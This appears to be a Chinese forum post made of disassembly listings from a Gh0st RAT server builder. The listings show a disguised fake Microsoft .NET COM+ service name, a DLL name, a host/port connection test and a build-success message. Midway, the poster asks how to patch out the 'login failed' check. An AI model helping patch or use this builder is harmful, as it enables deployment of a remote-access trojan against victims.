00403281 > 8B45 BC mov eax, dword ptr [ebp-44]
00403284 . 3945 D0 cmp dword ptr [ebp-30], eax
00403287 . 7D 13 jge short 0040329C
00403289 . 8D45 B4 lea eax, dword ptr [ebp-4C]
0040328C . 53 push ebx
0040328D . 50 push eax
0040328E . 56 push esi
0040328F . FF75 E0 push dword ptr [ebp-20]
00403292 . FF75 EC push dword ptr [ebp-14]
00403295 . FFD7 call edi
00403297 . FF45 D0 inc dword ptr [ebp-30]
0040329A .^ EB E5 jmp short 00403281
0040329C > FF75 E0 push dword ptr [ebp-20]
0040329F . E8 0BBF1300 call 0053F1AF
004032A4 . 59 pop ecx
004032A5 . C645 FC 09 mov byte ptr [ebp-4], 9
004032A9 . 8D4D D8 lea ecx, dword ptr [ebp-28]
004032AC . E8 B9FF1300 call 0054326A
004032B1 > 8D45 C0 lea eax, dword ptr [ebp-40]
004032B4 . 53 push ebx
004032B5 . BE 74095B00 mov esi, 005B0974 ; gggggg
004032BA . 50 push eax
004032BB . 56 push esi ; /String => "GGGGGG"
004032BC . FF15 88145700 call dword ptr [<&KERNEL32.lstrlenA>] ; \lstrlenA
004032C2 . 50 push eax
004032C3 . 56 push esi
004032C4 . FF75 EC push dword ptr [ebp-14]
004032C7 . FFD7 call edi
004032C9 . 8B45 DC mov eax, dword ptr [ebp-24]
004032CC . 53 push ebx
004032CD . 8D4D DC lea ecx, dword ptr [ebp-24]
004032D0 . 8B70 F8 mov esi, dword ptr [eax-8]
004032D3 . E8 C2031400 call 0054369A
004032D8 . 8D4D C0 lea ecx, dword ptr [ebp-40]
004032DB . 53 push ebx
004032DC . 46 inc esi
004032DD . 51 push ecx
004032DE . 56 push esi
004032DF . 50 push eax
004032E0 . FF75 EC push dword ptr [ebp-14]
004032E3 . FFD7 call edi
004032E5 . 8D45 C0 lea eax, dword ptr [ebp-40]
004032E8 . 53 push ebx
004032E9 . BE 6C095B00 mov esi, 005B096C ; ssssss
004032EE . 50 push eax
004032EF . 56 push esi ; /String => "SSSSSS"
004032F0 . FF15 88145700 call dword ptr [<&KERNEL32.lstrlenA>] ; \lstrlenA
004032F6 . 50 push eax
004032F7 . 56 push esi
004032F8 . FF75 EC push dword ptr [ebp-14]
004032FB . FFD7 call edi
004032FD . 8B45 E8 mov eax, dword ptr [ebp-18]
00403300 . 53 push ebx
00403301 . 8D4D E8 lea ecx, dword ptr [ebp-18]
00403304 . 8B70 F8 mov esi, dword ptr [eax-8]
00403307 . E8 8E031400 call 0054369A
0040330C . 8D4D C0 lea ecx, dword ptr [ebp-40]
0040330F . 53 push ebx
00403310 . 46 inc esi
00403311 . 51 push ecx
00403312 . 56 push esi
00403313 . 50 push eax
00403314 . FF75 EC push dword ptr [ebp-14]
00403317 . FFD7 call edi
00403319 . FF75 EC push dword ptr [ebp-14] ; /hObject
0040331C . FF15 9C145700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00403322 . 8B4D CC mov ecx, dword ptr [ebp-34]
00403325 . 68 35040000 push 435
0040332A . E8 45F31300 call 00542674
0040332F . 53 push ebx ; /lParam
00403330 . 53 push ebx ; |wParam
00403331 . 68 F0000000 push 0F0 ; |Message = BM_GETCHECK
00403336 . FF70 1C push dword ptr [eax+1C] ; |hWnd
00403339 . FF15 7C175700 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
0040333F . 83F8 01 cmp eax, 1
00403342 . 75 17 jnz short 0040335B
00403344 . 51 push ecx
00403345 . 8B4D B8 mov ecx, dword ptr [ebp-48]
00403348 . 8BC4 mov eax, esp
0040334A . 8965 B4 mov dword ptr [ebp-4C], esp
0040334D . 50 push eax
0040334E . E8 399A1300 call 0053CD8C
00403353 . 8B4D CC mov ecx, dword ptr [ebp-34]
00403356 . E8 BB000000 call 00403416
0040335B > 53 push ebx ; /Arg3
0040335C . 53 push ebx ; |Arg2
0040335D . 68 5C095B00 push 005B095C ; |生成文件成功.
00403362 . E8 C2851400 call 0054B929 ; \gh0st.0054B929
00403367 . EB 3F jmp short 004033A8
00403369 . 33DB xor ebx, ebx
0040336B . 395D C4 cmp dword ptr [ebp-3C], ebx
0040336E . 74 0A je short 0040337A
00403370 . FF75 C4 push dword ptr [ebp-3C]
00403373 . FF15 A01D5900 call dword ptr [591DA0] ; gh0st.00529242
00403379 . 59 pop ecx
0040337A > 8B4D B8 mov ecx, dword ptr [ebp-48]
0040337D . 8D45 BC lea eax, dword ptr [ebp-44]
00403380 . 50 push eax
00403381 . E8 F6981300 call 0053CC7C
00403386 . FF30 push dword ptr [eax] ; /FileName
00403388 . FF15 74145700 call dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
0040338E . 8D4D BC lea ecx, dword ptr [ebp-44]
00403391 . E8 D4FE1300 call 0054326A
00403396 . 53 push ebx ; /Arg3
00403397 . 53 push ebx ; |Arg2
00403398 . FF75 A8 push dword ptr [ebp-58] ; |Arg1
0040339B . E8 89851400 call 0054B929 ; \gh0st.0054B929
004033A0 . B8 A6334000 mov eax, 004033A6
004033A5 . C3 retn
004033A6 . 33DB xor ebx, ebx
004033A8 > 8B4D CC mov ecx, dword ptr [ebp-34]
004033AB . C745 FC 07000>mov dword ptr [ebp-4], 7
004033B2 . E8 A6EFFFFF call 0040235D
004033B7 > 8D4D DC lea ecx, dword ptr [ebp-24]
004033BA . C645 FC 02 mov byte ptr [ebp-4], 2
004033BE . E8 A7FE1300 call 0054326A
004033C3 > 8D4D D4 lea ecx, dword ptr [ebp-2C]
004033C6 . C645 FC 01 mov byte ptr [ebp-4], 1
004033CA . E8 9BFE1300 call 0054326A
004033CF . 8D4D E4 lea ecx, dword ptr [ebp-1C]
004033D2 . 885D FC mov byte ptr [ebp-4], bl
004033D5 . E8 90FE1300 call 0054326A
004033DA . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
004033DE > 8D4D E8 lea ecx, dword ptr [ebp-18]
004033E1 . E8 84FE1300 call 0054326A
004033E6 . EB 1F jmp short 00403407
004033E8 > 53 push ebx
004033E9 . 53 push ebx
004033EA . 68 50095B00 push 005B0950 ; 登录失败!
004033EF .^ E9 02FBFFFF jmp 00402EF6
004033F4 > 6A 40 push 40
004033F6 . 68 E8085B00 push 005B08E8 ; 提示
004033FB . 68 28095B00 push 005B0928 ; 端口范围只能为1~65535之间的一个数 ...
00403400 > 53 push ebx ; |hOwner
00403401 . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
00403407 > 8B4D F4 mov ecx, dword ptr [ebp-C]
0040340A . 5F pop edi
0040340B . 5E pop esi
0040340C . 64:890D 00000>mov dword ptr fs:[0], ecx
00403413 . 5B pop ebx
00403414 . C9 leave
00403415 . C3 retn
这段程序代码,怎样能跳过“登入错误”这个提示的验证,该怎么改?麻烦高手能帮忙分析一下么, 万分感谢
00402319 |. 8BCB mov ecx, ebx
0040231B |. E8 D3101400 call 005433F3
00402320 |. BF 58075B00 mov edi, 005B0758 ; sgxy
00402325 |. 8BCB mov ecx, ebx
00402327 |. 57 push edi
00402328 |. 6A 00 push 0
0040232A |. E8 469E1300 call 0053C175
0040232F |. 57 push edi
00402330 |. 8BCB mov ecx, ebx
00402332 |. E8 0F131400 call 00543646
00402337 |. 6A 00 push 0
00402339 |. 8BCE mov ecx, esi
0040233B |. E8 24F81300 call 00541B64
00402340 |. 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402344 |. 8D4D F0 lea ecx, dword ptr [ebp-10]
00402347 |. E8 1E0F1400 call 0054326A
0040234C |. 8B4D F4 mov ecx, dword ptr [ebp-C]
0040234F |. 5F pop edi
00402350 |. 5E pop esi
00402351 |. 5B pop ebx
00402352 |. 64:890D 00000>mov dword ptr fs:[0], ecx
00402359 |. C9 leave
0040235A \. C2 0400 retn 4
0040235D /$ 68 68075B00 push 005B0768 ; /服务端生成
00402362 |. 6A 00 push 0 ; |Class = 0
00402364 |. FF15 90155700 call dword ptr [<&USER32.FindWindowA>>; \FindWindowA
0040236A |. 6A 00 push 0 ; /lParam = 0
0040236C |. 6A 01 push 1 ; |wParam = 1
0040236E |. 6A 10 push 10 ; |Message = WM_CLOSE
00402370 |. 50 push eax ; |hWnd
00402371 |. FF15 84155700 call dword ptr [<&USER32.PostMessageA>; \PostMessageA
00402377 \. C3 retn
00402378 . B8 04E85500 mov eax, 0055E804 ; 咐hy
0040237D . E8 F6611200 call 00528578
00402382 . 81EC B0040000 sub esp, 4B0
00402388 . 53 push ebx
00402389 . 56 push esi
0040238A . 57 push edi
0040238B . 8BD9 mov ebx, ecx
0040238D . E8 C8271400 call 00544B5A
00402392 . 33F6 xor esi, esi
00402394 . 56 push esi ; /Timerproc => NULL
00402395 . 6A 64 push 64 ; |Timeout = 100. ms
00402397 . 56 push esi ; |TimerID => 0
00402398 . FF73 1C push dword ptr [ebx+1C] ; |hWnd
0040239B . FF15 94155700 call dword ptr [<&USER32.SetTimer>] ; \SetTimer
004023A1 . 8D85 44FBFFFF lea eax, dword ptr [ebp-4BC]
004023A7 . 50 push eax ; /pWSAData
004023A8 . 68 01010000 push 101 ; |RequestedVersion = 101 (1.1.)
004023AD . FF15 B4195700 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
004023B3 . 80A5 D4FDFFFF>and byte ptr [ebp-22C], 0
004023BA . 6A 7F push 7F
004023BC . 59 pop ecx
004023BD . 33C0 xor eax, eax
004023BF . 8DBD D5FDFFFF lea edi, dword ptr [ebp-22B]
004023C5 . 68 00020000 push 200 ; /BufSize = 200 (512.)
004023CA . F3:AB rep stos dword ptr es:[edi] ; |
004023CC . 66:AB stos word ptr es:[edi] ; |
004023CE . AA stos byte ptr es:[edi] ; |
004023CF . 8D85 D4FDFFFF lea eax, dword ptr [ebp-22C] ; |
004023D5 . 50 push eax ; |Buffer
004023D6 . FF15 B8195700 call dword ptr [<&WS2_32.#57>] ; \gethostname
004023DC . 85C0 test eax, eax
004023DE . 0F85 11040000 jnz 004027F5
004023E4 . 8D85 D4FDFFFF lea eax, dword ptr [ebp-22C]
004023EA . 50 push eax ; /Name
004023EB . FF15 BC195700 call dword ptr [<&WS2_32.#52>] ; \gethostbyname
004023F1 . 8BF8 mov edi, eax
004023F3 . 3BFE cmp edi, esi
004023F5 . 0F84 FA030000 je 004027F5
004023FB . 8B47 0C mov eax, dword ptr [edi+C]
004023FE . 8B00 mov eax, dword ptr [eax]
00402400 . 3BC6 cmp eax, esi
00402402 . 74 42 je short 00402446
00402404 . 8975 F0 mov dword ptr [ebp-10], esi
00402407 > 0FBF4F 0A movsx ecx, word ptr [edi+A]
0040240B . 51 push ecx
0040240C . 50 push eax
0040240D . 8D45 D8 lea eax, dword ptr [ebp-28]
00402410 . 50 push eax
00402411 . E8 8A611200 call 005285A0
00402416 . 83C4 0C add esp, 0C
00402419 . FF75 D8 push dword ptr [ebp-28]
0040241C . FF15 40195700 call dword ptr [<&WS2_32.#12>] ; WS2_32.inet_ntoa
00402422 . 50 push eax ; /lParam
00402423 . 56 push esi ; |wParam
00402424 . 68 43010000 push 143 ; |Message = CB_ADDSTRING
00402429 . FFB3 B4000000 push dword ptr [ebx+B4] ; |hWnd
0040242F . FF15 7C175700 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
00402435 . 8345 F0 04 add dword ptr [ebp-10], 4
00402439 . 8B47 0C mov eax, dword ptr [edi+C]
0040243C . 8B4D F0 mov ecx, dword ptr [ebp-10]
0040243F . 8B0401 mov eax, dword ptr [ecx+eax]
00402442 . 3BC6 cmp eax, esi
00402444 .^ 75 C1 jnz short 00402407
00402446 > 8B3D 7C175700 mov edi, dword ptr [<&USER32.SendMes>; USER32.SendMessageA
0040244C . 56 push esi ; /lParam
0040244D . 56 push esi ; |wParam
0040244E . 68 4E010000 push 14E ; |Message = CB_SETCURSEL
00402453 . FFB3 B4000000 push dword ptr [ebx+B4] ; |hWnd
00402459 . FFD7 call edi ; \SendMessageA
0040245B . FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
00402461 . 80BB 44010000>cmp byte ptr [ebx+144], 0
00402468 . 0F84 13030000 je 00402781
0040246E . 56 push esi
0040246F . 8BCB mov ecx, ebx
00402471 . E8 EEF61300 call 00541B64
00402476 . 51 push ecx
00402477 . 8BCC mov ecx, esp
00402479 . 8965 E4 mov dword ptr [ebp-1C], esp
0040247C . 68 6C085B00 push 005B086C ; http://www.xxx.com/ip.jpg
00402481 . E8 520E1400 call 005432D8
00402486 . 51 push ecx
00402487 . 8975 FC mov dword ptr [ebp-4], esi
0040248A . 8BCC mov ecx, esp
0040248C . 8965 E8 mov dword ptr [ebp-18], esp
0040248F . 68 64085B00 push 005B0864 ; httpurl
00402494 . E8 3F0E1400 call 005432D8
00402499 . 51 push ecx
0040249A . BF 28075B00 mov edi, 005B0728 ; build
0040249F . 8BCC mov ecx, esp
004024A1 . 8965 EC mov dword ptr [ebp-14], esp
004024A4 . 57 push edi
004024A5 . C645 FC 01 mov byte ptr [ebp-4], 1
004024A9 . E8 2A0E1400 call 005432D8
004024AE . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
004024B2 . 8D45 F0 lea eax, dword ptr [ebp-10]
004024B5 . 50 push eax
004024B6 . E8 F1160000 call 00403BAC
004024BB . 8BC8 mov ecx, eax
004024BD . BE C0000000 mov esi, 0C0
004024C2 . 03CE add ecx, esi
004024C4 . E8 37730000 call 00409800
004024C9 . FF30 push dword ptr [eax]
004024CB . 8BCB mov ecx, ebx
004024CD . C745 FC 03000>mov dword ptr [ebp-4], 3
004024D4 . 68 FD030000 push 3FD
004024D9 . E8 55021400 call 00542733
004024DE . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
004024E2 . 8D4D F0 lea ecx, dword ptr [ebp-10]
004024E5 . E8 800D1400 call 0054326A
004024EA . 51 push ecx
004024EB . 8BCC mov ecx, esp
004024ED . 8965 EC mov dword ptr [ebp-14], esp
004024F0 . 68 58085B00 push 005B0858 ; qqcrt.dll
004024F5 . E8 DE0D1400 call 005432D8
004024FA . 51 push ecx
004024FB . C745 FC 04000>mov dword ptr [ebp-4], 4
00402502 . 8BCC mov ecx, esp
00402504 . 8965 E8 mov dword ptr [ebp-18], esp
00402507 . 68 50085B00 push 005B0850 ; dllname
0040250C . E8 C70D1400 call 005432D8
00402511 . 51 push ecx
00402512 . C645 FC 05 mov byte ptr [ebp-4], 5
00402516 . 8BCC mov ecx, esp
00402518 . 8965 E4 mov dword ptr [ebp-1C], esp
0040251B . 57 push edi
0040251C . E8 B70D1400 call 005432D8
00402521 . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402525 . 8D45 F0 lea eax, dword ptr [ebp-10]
00402528 . 50 push eax
00402529 . E8 7E160000 call 00403BAC
0040252E . 8BC8 mov ecx, eax
00402530 . 03CE add ecx, esi
00402532 . E8 C9720000 call 00409800
00402537 . FF30 push dword ptr [eax]
00402539 . 8BCB mov ecx, ebx
0040253B . C745 FC 07000>mov dword ptr [ebp-4], 7
00402542 . 68 61040000 push 461
00402547 . E8 E7011400 call 00542733
0040254C . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402550 . 8D4D F0 lea ecx, dword ptr [ebp-10]
00402553 . E8 120D1400 call 0054326A
00402558 . 51 push ecx
00402559 . 8BCC mov ecx, esp
0040255B . 8965 EC mov dword ptr [ebp-14], esp
0040255E . 68 B8685C00 push 005C68B8
00402563 . E8 700D1400 call 005432D8
00402568 . 51 push ecx
00402569 . C745 FC 08000>mov dword ptr [ebp-4], 8
00402570 . 8BCC mov ecx, esp
00402572 . 8965 E8 mov dword ptr [ebp-18], esp
00402575 . 68 4C085B00 push 005B084C ; dns
0040257A . E8 590D1400 call 005432D8
0040257F . 51 push ecx
00402580 . C645 FC 09 mov byte ptr [ebp-4], 9
00402584 . 8BCC mov ecx, esp
00402586 . 8965 E4 mov dword ptr [ebp-1C], esp
00402589 . 57 push edi
0040258A . E8 490D1400 call 005432D8
0040258F . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402593 . 8D45 F0 lea eax, dword ptr [ebp-10]
00402596 . 50 push eax
00402597 . E8 10160000 call 00403BAC
0040259C . 8BC8 mov ecx, eax
0040259E . 03CE add ecx, esi
004025A0 . E8 5B720000 call 00409800
004025A5 . FF30 push dword ptr [eax]
004025A7 . 8BCB mov ecx, ebx
004025A9 . C745 FC 0B000>mov dword ptr [ebp-4], 0B
004025B0 . 68 FE030000 push 3FE
004025B5 . E8 79011400 call 00542733
004025BA . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
004025BE . 8D4D F0 lea ecx, dword ptr [ebp-10]
004025C1 . E8 A40C1400 call 0054326A
004025C6 . 51 push ecx
004025C7 . 8BCC mov ecx, esp
004025C9 . 8965 EC mov dword ptr [ebp-14], esp
004025CC . 68 44085B00 push 005B0844 ; .netshi
004025D1 . E8 020D1400 call 005432D8
004025D6 . 51 push ecx
004025D7 . C745 FC 0C000>mov dword ptr [ebp-4], 0C
004025DE . 8BCC mov ecx, esp
004025E0 . 8965 E8 mov dword ptr [ebp-18], esp
004025E3 . 68 38085B00 push 005B0838 ; servicename
004025E8 . E8 EB0C1400 call 005432D8
004025ED . 51 push ecx
004025EE . C645 FC 0D mov byte ptr [ebp-4], 0D
004025F2 . 8BCC mov ecx, esp
004025F4 . 8965 E4 mov dword ptr [ebp-1C], esp
004025F7 . 57 push edi
004025F8 . E8 DB0C1400 call 005432D8
004025FD . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402601 . 8D45 F0 lea eax, dword ptr [ebp-10]
00402604 . 50 push eax
00402605 . E8 A2150000 call 00403BAC
0040260A . 8BC8 mov ecx, eax
0040260C . 03CE add ecx, esi
0040260E . E8 ED710000 call 00409800
00402613 . FF30 push dword ptr [eax]
00402615 . 8BCB mov ecx, ebx
00402617 . C745 FC 0F000>mov dword ptr [ebp-4], 0F
0040261E . 68 2C040000 push 42C
00402623 . E8 0B011400 call 00542733
00402628 . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
0040262C . 8D4D F0 lea ecx, dword ptr [ebp-10]
0040262F . E8 360C1400 call 0054326A
00402634 . 51 push ecx
00402635 . 8BCC mov ecx, esp
00402637 . 8965 EC mov dword ptr [ebp-14], esp
0040263A . 68 10085B00 push 005B0810 ; microsoft .net framework com+ support
0040263F . E8 940C1400 call 005432D8
00402644 . 51 push ecx
00402645 . C745 FC 10000>mov dword ptr [ebp-4], 10
0040264C . 8BCC mov ecx, esp
0040264E . 8965 E8 mov dword ptr [ebp-18], esp
00402651 . 68 04085B00 push 005B0804 ; displayname
00402656 . E8 7D0C1400 call 005432D8
0040265B . 51 push ecx
0040265C . C645 FC 11 mov byte ptr [ebp-4], 11
00402660 . 8BCC mov ecx, esp
00402662 . 8965 E4 mov dword ptr [ebp-1C], esp
00402665 . 57 push edi
00402666 . E8 6D0C1400 call 005432D8
0040266B . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
0040266F . 8D45 F0 lea eax, dword ptr [ebp-10]
00402672 . 50 push eax
00402673 . E8 34150000 call 00403BAC
00402678 . 8BC8 mov ecx, eax
0040267A . 03CE add ecx, esi
0040267C . E8 7F710000 call 00409800
00402681 . FF30 push dword ptr [eax]
00402683 . 8BCB mov ecx, ebx
00402685 . C745 FC 13000>mov dword ptr [ebp-4], 13
0040268C . 68 22040000 push 422
00402691 . E8 9D001400 call 00542733
00402696 . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
0040269A . 8D4D F0 lea ecx, dword ptr [ebp-10]
0040269D . E8 C80B1400 call 0054326A
004026A2 . 51 push ecx
004026A3 . 8BCC mov ecx, esp
004026A5 . 8965 EC mov dword ptr [ebp-14], esp
004026A8 . 68 C8075B00 push 005B07C8 ; microsoft .net and windows xp com+ integration with soap
004026AD . E8 260C1400 call 005432D8
004026B2 . 51 push ecx
004026B3 . C745 FC 14000>mov dword ptr [ebp-4], 14
004026BA . 8BCC mov ecx, esp
004026BC . 8965 E8 mov dword ptr [ebp-18], esp
004026BF . 68 BC075B00 push 005B07BC ; description
004026C4 . E8 0F0C1400 call 005432D8
004026C9 . 51 push ecx
004026CA . C645 FC 15 mov byte ptr [ebp-4], 15
004026CE . 8BCC mov ecx, esp
004026D0 . 8965 E4 mov dword ptr [ebp-1C], esp
004026D3 . 57 push edi
004026D4 . E8 FF0B1400 call 005432D8
004026D9 . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
004026DD . 8D45 F0 lea eax, dword ptr [ebp-10]
004026E0 . 50 push eax
004026E1 . E8 C6140000 call 00403BAC
004026E6 . 8BC8 mov ecx, eax
004026E8 . 03CE add ecx, esi
004026EA . E8 11710000 call 00409800
004026EF . FF30 push dword ptr [eax]
004026F1 . 8BCB mov ecx, ebx
004026F3 . C745 FC 17000>mov dword ptr [ebp-4], 17
004026FA . 68 23040000 push 423
004026FF . E8 2F001400 call 00542733
00402704 . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402708 . 8D4D F0 lea ecx, dword ptr [ebp-10]
0040270B . E8 5A0B1400 call 0054326A
00402710 . 8BCB mov ecx, ebx
00402712 . E8 EF000000 call 00402806
00402717 . 8B83 40010000 mov eax, dword ptr [ebx+140]
0040271D . 8DB3 40010000 lea esi, dword ptr [ebx+140]
00402723 . 33FF xor edi, edi
00402725 . 3978 F8 cmp dword ptr [eax-8], edi
00402728 . 75 3F jnz short 00402769
0040272A . 8D85 D4FCFFFF lea eax, dword ptr [ebp-32C]
00402730 . 68 00010000 push 100 ; /BufSize = 100 (256.)
00402735 . 50 push eax ; |Buffer
00402736 . FF15 B8195700 call dword ptr [<&WS2_32.#57>] ; \gethostname
0040273C . 8D85 D4FCFFFF lea eax, dword ptr [ebp-32C]
00402742 . 50 push eax ; /Name
00402743 . FF15 BC195700 call dword ptr [<&WS2_32.#52>] ; \gethostbyname
00402749 . 3BC7 cmp eax, edi
0040274B . 74 10 je short 0040275D
0040274D . 8B40 0C mov eax, dword ptr [eax+C]
00402750 . 8B00 mov eax, dword ptr [eax]
00402752 . FF30 push dword ptr [eax]
00402754 . FF15 40195700 call dword ptr [<&WS2_32.#12>] ; WS2_32.inet_ntoa
0040275A . 50 push eax
0040275B . EB 05 jmp short 00402762
0040275D > 68 B0075B00 push 005B07B0 ; 127.0.0.1
00402762 > 8BCE mov ecx, esi
00402764 . E8 8A0C1400 call 005433F3
00402769 > 57 push edi
0040276A . 8BCB mov ecx, ebx
0040276C . E8 FCFAFFFF call 0040226D
00402771 . 57 push edi
00402772 . 8BCB mov ecx, ebx
00402774 . E8 EBF31300 call 00541B64
00402779 . 8B3D 7C175700 mov edi, dword ptr [<&USER32.SendMes>; USER32.SendMessageA
0040277F . 33F6 xor esi, esi
00402781 > 68 98075B00 push 005B0798 ; documents and settings
00402786 . 56 push esi
00402787 . BE 43010000 mov esi, 143
0040278C . 56 push esi
0040278D . FFB3 F0000000 push dword ptr [ebx+F0]
00402793 . FFD7 call edi
00402795 . 68 88075B00 push 005B0788 ; program files
0040279A . 6A 00 push 0
0040279C . 56 push esi
0040279D . FFB3 F0000000 push dword ptr [ebx+F0]
004027A3 . FFD7 call edi
004027A5 . 68 80075B00 push 005B0780 ; windows
004027AA . 6A 00 push 0
004027AC . 56 push esi
004027AD . FFB3 F0000000 push dword ptr [ebx+F0]
004027B3 . FFD7 call edi
004027B5 . 68 74075B00 push 005B0774 ; windows\web
004027BA . 6A 00 push 0
004027BC . 56 push esi
004027BD . FFB3 F0000000 push dword ptr [ebx+F0]
004027C3 . FFD7 call edi
004027C5 . 6A 00 push 0
004027C7 . 6A 03 push 3
004027C9 . 68 4E010000 push 14E
004027CE . FFB3 F0000000 push dword ptr [ebx+F0]
004027D4 . FFD7 call edi
004027D6 . 68 30040000 push 430
004027DB . 8BCB mov ecx, ebx
004027DD . E8 92FE1300 call 00542674
004027E2 . 6A 00 push 0
004027E4 . 6A 01 push 1
004027E6 . 68 F1000000 push 0F1
004027EB . FF70 1C push dword ptr [eax+1C]
004027EE . FFD7 call edi
004027F0 . 6A 01 push 1
004027F2 . 58 pop eax
004027F3 . EB 02 jmp short 004027F7
004027F5 > 33C0 xor eax, eax
004027F7 > 8B4D F4 mov ecx, dword ptr [ebp-C]
004027FA . 5F pop edi
004027FB . 5E pop esi
004027FC . 64:890D 00000>mov dword ptr fs:[0], ecx
00402803 . 5B pop ebx
00402804 . C9 leave
00402805 . C3 retn
00402806 /$ 56 push esi
00402807 |. 8BF1 mov esi, ecx
00402809 |. 6A 01 push 1
0040280B |. E8 54F31300 call 00541B64
00402810 |. FFB6 28010000 push dword ptr [esi+128]
00402816 |. 8BCE mov ecx, esi
00402818 |. 68 FD030000 push 3FD
0040281D |. E8 52FE1300 call 00542674
00402822 |. 8BC8 mov ecx, eax
00402824 |. E8 89011400 call 005429B2
00402829 |. 5E pop esi
0040282A \. C3 retn
0040282B . B8 18E85500 mov eax, 0055E818
00402830 . E8 435D1200 call 00528578
00402835 . 81EC B8020000 sub esp, 2B8
0040283B . A1 68395B00 mov eax, dword ptr [5B3968]
00402840 . 53 push ebx
00402841 . 56 push esi
00402842 . 57 push edi
00402843 . 8945 EC mov dword ptr [ebp-14], eax
00402846 . 6A 01 push 1
00402848 . 8D85 3CFDFFFF lea eax, dword ptr [ebp-2C4]
0040284E . 5B pop ebx
0040284F . 33FF xor edi, edi
00402851 . 50 push eax ; /pWSAData
00402852 . 68 01020000 push 201 ; |RequestedVersion = 201 (1.2.)
00402857 . 897D FC mov dword ptr [ebp-4], edi ; |
0040285A . 885D F3 mov byte ptr [ebp-D], bl ; |
0040285D . FF15 B4195700 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
00402863 . 6A 06 push 6 ; /Protocol = IPPROTO_TCP
00402865 . 53 push ebx ; |Type => SOCK_STREAM
00402866 . 6A 02 push 2 ; |Family = AF_INET
00402868 . FF15 9C195700 call dword ptr [<&WS2_32.#23>] ; \socket
0040286E . 8BF0 mov esi, eax
00402870 . 83FE FF cmp esi, -1
00402873 . 75 18 jnz short 0040288D
00402875 . 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
00402877 . 68 E8085B00 push 005B08E8 ; |提示
0040287C . 68 D4085B00 push 005B08D4 ; |socket 初始化失败
00402881 . 57 push edi ; |hOwner => NULL
00402882 . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
00402888 . E9 E1000000 jmp 0040296E
0040288D > 8D45 E8 lea eax, dword ptr [ebp-18]
00402890 . 895D E8 mov dword ptr [ebp-18], ebx
00402893 . 50 push eax ; /Parm
00402894 . 68 7E660480 push 8004667E ; |Cmd = FIONBIO
00402899 . 56 push esi ; |Socket
0040289A . FF15 A0195700 call dword ptr [<&WS2_32.#10>] ; \ioctlsocket
004028A0 . 897D E4 mov dword ptr [ebp-1C], edi
004028A3 . 8B7D 08 mov edi, dword ptr [ebp+8]
004028A6 . C745 E0 03000>mov dword ptr [ebp-20], 3
004028AD . FFB7 40010000 push dword ptr [edi+140] ; /Name
004028B3 . FF15 BC195700 call dword ptr [<&WS2_32.#52>] ; \gethostbyname
004028B9 . 85C0 test eax, eax
004028BB . 8945 08 mov dword ptr [ebp+8], eax
004028BE . 74 5E je short 0040291E
004028C0 . FFB7 20010000 push dword ptr [edi+120]
004028C6 . 66:C745 D0 02>mov word ptr [ebp-30], 2
004028CC . FF15 A41D5900 call dword ptr [591DA4] ; gh0st.00529FFF
004028D2 . 59 pop ecx
004028D3 . 50 push eax ; /NetShort
004028D4 . FF15 A4195700 call dword ptr [<&WS2_32.#9>] ; \ntohs
004028DA . 66:8945 D2 mov word ptr [ebp-2E], ax
004028DE . 8B45 08 mov eax, dword ptr [ebp+8]
004028E1 . 6A 10 push 10 ; /AddrLen = 10 (16.)
004028E3 . 8B40 0C mov eax, dword ptr [eax+C] ; |
004028E6 . 8B00 mov eax, dword ptr [eax] ; |
004028E8 . 8B00 mov eax, dword ptr [eax] ; |
004028EA . 8945 D4 mov dword ptr [ebp-2C], eax ; |
004028ED . 8D45 D0 lea eax, dword ptr [ebp-30] ; |
004028F0 . 50 push eax ; |pSockAddr
004028F1 . 56 push esi ; |Socket
004028F2 . FF15 A8195700 call dword ptr [<&WS2_32.#4>] ; \connect
004028F8 . 8D45 E0 lea eax, dword ptr [ebp-20]
004028FB . 8D8D CCFEFFFF lea ecx, dword ptr [ebp-134]
00402901 . 50 push eax ; /pTimeout
00402902 . 33C0 xor eax, eax ; |
00402904 . 50 push eax ; |Exceptfds => NULL
00402905 . 51 push ecx ; |Writefds
00402906 . 50 push eax ; |Readfds => NULL
00402907 . 50 push eax ; |nfds => 0
00402908 . 89B5 D0FEFFFF mov dword ptr [ebp-130], esi ; |
0040290E . 899D CCFEFFFF mov dword ptr [ebp-134], ebx ; |
00402914 . FF15 AC195700 call dword ptr [<&WS2_32.#18>] ; \select
0040291A . 85C0 test eax, eax
0040291C . 7F 04 jg short 00402922
0040291E > 8065 F3 00 and byte ptr [ebp-D], 0
00402922 > 56 push esi ; /Socket
00402923 . FF15 B0195700 call dword ptr [<&WS2_32.#3>] ; \closesocket
00402929 . FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
0040292F . FFB7 20010000 push dword ptr [edi+120]
00402935 . 807D F3 00 cmp byte ptr [ebp-D], 0
00402939 . FFB7 40010000 push dword ptr [edi+140]
0040293F . 74 07 je short 00402948
00402941 . 68 AC085B00 push 005B08AC ; 成功连接到主机“%s”的“%s”端口 ...
00402946 . EB 05 jmp short 0040294D
00402948 > 68 88085B00 push 005B0888 ; 打开到主机“%s:%s”的连接失败 ...
0040294D > 8D45 EC lea eax, dword ptr [ebp-14]
00402950 . 50 push eax
00402951 . E8 C99F1300 call 0053C91F
